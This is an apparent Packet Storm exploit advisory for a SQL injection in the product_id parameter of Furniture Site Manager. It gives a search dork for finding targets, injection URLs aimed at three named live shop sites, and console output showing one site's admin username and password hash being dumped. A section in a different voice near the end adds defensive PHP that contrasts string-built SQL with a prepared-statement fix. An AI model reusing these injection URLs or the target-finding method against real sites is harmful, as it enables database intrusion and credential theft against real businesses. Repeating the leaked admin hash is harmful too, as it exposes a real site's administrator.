Furniture Site Manager SQL Injection

2014-08-27T00:00:00
ID PACKETSTORM:128020
Type packetstorm
Reporter KnocKout
Modified 2014-08-27T00:00:00

Description

Furniture Site Manager => Remote (product_id) SQL Injection Vulnerability  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Author : KnocKout  
[~] Contact : knockout@e-mail.com.tr (onlymail)  
[~] HomePage : http://h4x0resec.blogspot.com - http://cyber-warrior.org   
[~] GREETZ : DaiMon,BARCOD3_UnDeRTaKeR_   
[Say]: How have you been, guys? I'm sure xoron still keeps an eye on these parts. Drop by and say hi once in a while, don't make us miss you :)  
{Let it be known, we're back from the chick...}  
{THE H4X0RE SECURITY PROJECT continues!!} (Turkey)  
  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : Furniture Site Manager  
|~Price : N/A  
|~Software: https://www.balcom-vetillo.com/furniture-site-manager/ - https://www.furnituresitemanager.com/  
|~Vulnerability Style : SQL Injection  
|~Vulnerability Dir : /  
|~Keyword : "Powered By Furniture Site Manager"  
|[~]Date : "27.AG.2014"  
|[~]Tested on : (L):Kali Linux, Windows XP (R):Apache, PHP 5.4.31, MySQL 5  
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Demos:   
http://finestfurniture.com/index.php?route=product/product&path=69&product_id=29880' AAAAAAAAAAAAAAA  
http://lakeknoxvillefurnitureco.com/index.php?route=product/product&product_id=36398' AAAAAAAAAAAAAAAA  
http://curlysfurniture.com/index.php?route=product/product&path=68&product_id=7171' AAAAAAAAAAAAAAAA  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
===============================================================  
|{~~~~~~~~ Exploitation| SQL Injection~~~~~~~~~~~}|  
  
http://$Site/$path/index.php?route=product/product&path=[true ID]&product_id=[true ID]' {SQL Injection}  
http://$Site/$path/index.php?route=product/product&product_id=[true ID]' {SQL INJECTION}  
  
Ex; http://curlysfurniture.com  
[~] SQL Injecting..  
  
http://curlysfurniture.com/index.php?route=product/product&path=68&product_id=7171' //SQL Command  
The console output:  
...  
[20:56:26] [INFO] fetching columns 'user_id=1, password, username' for table 'oc_user' in database 'curlysfurniture'  
[20:56:26] [INFO] the SQL query used returns 2 entries  
[20:56:26] [INFO] resumed: username  
[20:56:26] [INFO] resumed: varchar(20)  
[20:56:26] [INFO] resumed: password  
[20:56:26] [INFO] resumed: varchar(40)  
[20:56:26] [INFO] fetching entries of column(s) 'password, username' for table 'oc_user' in database 'curlysfurniture'  
[20:56:26] [INFO] the SQL query used returns 1 entries  
[20:56:26] [INFO] resumed: 749ec92d59aada28cd05de30b8e23aef92b8221c  
[20:56:26] [INFO] resumed: admin  
...  
...  
...  
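The defect class behind the pattern above is a product_id value copied straight into SQL text, and the fix is the usual one: validate the identifier as an integer and bind it through a prepared statement. The following is an added illustration, not Furniture Site Manager's own code; it assumes $db is an open mysqli connection and a hypothetical `product` table (the advisory names only the `oc_user` table it reads, not the product query).

```php
<?php
// Added illustration of the defect class the advisory describes; not the
// vendor's code. Assumptions: $db is an open mysqli connection and the
// products live in a hypothetical table `product`.

// Vulnerable pattern: the raw product_id query-string value is spliced into
// the SQL text, so a value like 7171' breaks the statement's syntax.
function getProductVulnerable(mysqli $db, array $get)
{
    $sql = "SELECT product_id, name, price FROM product WHERE product_id = "
         . $get['product_id'];
    $result = $db->query($sql);
    return $result ? $result->fetch_assoc() : null;
}

// Hardened pattern: accept only an unsigned integer identifier and bind it
// through a prepared statement, so the value is never parsed as SQL.
function getProductHardened(mysqli $db, array $get)
{
    $raw = isset($get['product_id']) ? (string) $get['product_id'] : '';
    if ($raw === '' || !ctype_digit($raw)) {
        return null;   // caller answers 400/404; worth logging for detection
    }
    $productId = (int) $raw;

    $stmt = $db->prepare(
        "SELECT product_id, name, price FROM product WHERE product_id = ?"
    );
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $productId);
    $stmt->execute();
    $stmt->bind_result($id, $name, $price);   // works without mysqlnd
    $row = $stmt->fetch()
        ? array('product_id' => $id, 'name' => $name, 'price' => $price)
        : null;
    $stmt->close();
    return $row;
}
```

Rejected requests in the hardened path are a cheap detection signal: a product_id that is not purely digits (a trailing quote, for instance) is the exact shape of the advisory's demo URLs.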
=============================================================  
Good luck. Greetz TURKEY  